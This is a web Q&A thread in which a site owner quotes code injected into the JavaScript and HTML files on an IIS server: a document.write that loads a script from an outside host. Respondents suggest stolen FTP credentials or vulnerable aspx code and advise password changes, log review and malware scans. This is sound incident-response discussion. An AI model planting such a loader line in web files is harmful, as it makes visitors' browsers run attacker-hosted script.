# HTML and Javascript Files Attacked

Tags: javascript, html, client-side-attacks, server-side-attacks

I have many javascript and html files in my IIS server. Some days before, some strange code injected into the files. Code below.

```
/*ec8243*/
document.write('<script type="text/javascript" src="http://brilleandmore.de/cgi-bin/cnt.php?id=5655549"></script>');
/*/ec8243*/
```

I have removed this code from all the javascript files. Please help me to know about how these code injected into my files in the server. I have gone through XSS attacks. But I can't find anything. Thanks in advance.

Comment: Where did these scripts appear exactly? Are they coming from a database or are they hard coded in your html files?

Comment: There codes are hard coded into my html and javascript files in the server.

Comment: It's hard to say without server logs and more information, but your ftp credentials might be compromised.

Comment: possible duplicate of [How Can I Find Out \*HOW\* My Site Was Hacked? How Do I Find Site Vulnerabilities?](http://stackoverflow.com/questions/308406/how-can-i-find-out-how-my-site-was-hacked-how-do-i-find-site-vulnerabilities)

Answer (score 1, accepted):

If you have only static HTML and JS files and no database attached, then probably your server is compromised. Either you have weak FTP passwords or you reuse the password from your email address.

Or your server or the Computer accessing the server is infected with some malware.

- Change your passwords
- Look into the server logs to find successful logins from suspicious IP addresses
- Scan your systems for malware

Comment: I have aspx and php files and database connections in the server.

Comment: What aspx applications do you run? Are they up to date? Or are they self written? Chances are, they have a security issue and an attacker was able to modify your files.

Comment: It's a website. So I have kept aspx as server side scripting.

Comment: If you wrote the aspx yourself, then you have to check it for security issues. If the aspx is from someone else, look for an update.